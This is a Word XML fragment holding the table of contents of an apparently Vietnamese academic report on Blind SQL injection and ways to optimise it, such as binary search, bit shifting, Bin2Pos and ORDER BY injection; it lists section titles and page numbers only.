            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công Out of Band Channel</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822494 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</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95" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các kỹ thuật tấn công nâng cao</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822495 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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496" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.</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Tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822496 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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7" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.1.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công Blind SQL injection dạng Content-Based</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822497 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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498" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tấn công Blind SQL injection dạng Time-Based</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822498 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822499" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 2:</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các phương pháp tối ưu hóa tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822499 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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0" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</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Hạn chế của tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822500 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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1" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các phương pháp tối ưu hóa truyền thống</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822501 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</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2" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.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Tối ưu hóa sử dụng thuật toán tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822502 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</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3" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tối ưu hóa sử dụng Regex</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822503 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</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4" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tối ưu hóa sử dụng phương pháp dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822504 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</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5" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Phương pháp tối ưu bằng cách dùng Bin2Pos</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822505 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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6" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</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Hướng tiếp cận mới trong khai thác lỗ hổng Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822506 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822507" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 3:</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Đề xuất tối ưu hóa tấn công Blind SQL injection dựa trên phân tích thứ tự nội dung trả về.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822507 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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08" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</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Khai thác SQL injection trong mệnh đề ORDER BY</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822508 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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09" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.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Mệnh đề Order by trong truy vấn SQL</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822509 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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0" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822510 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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11" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</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Kỹ thuật tối ưu dựa trên tối ưu hóa nội dung trả về</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822511 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
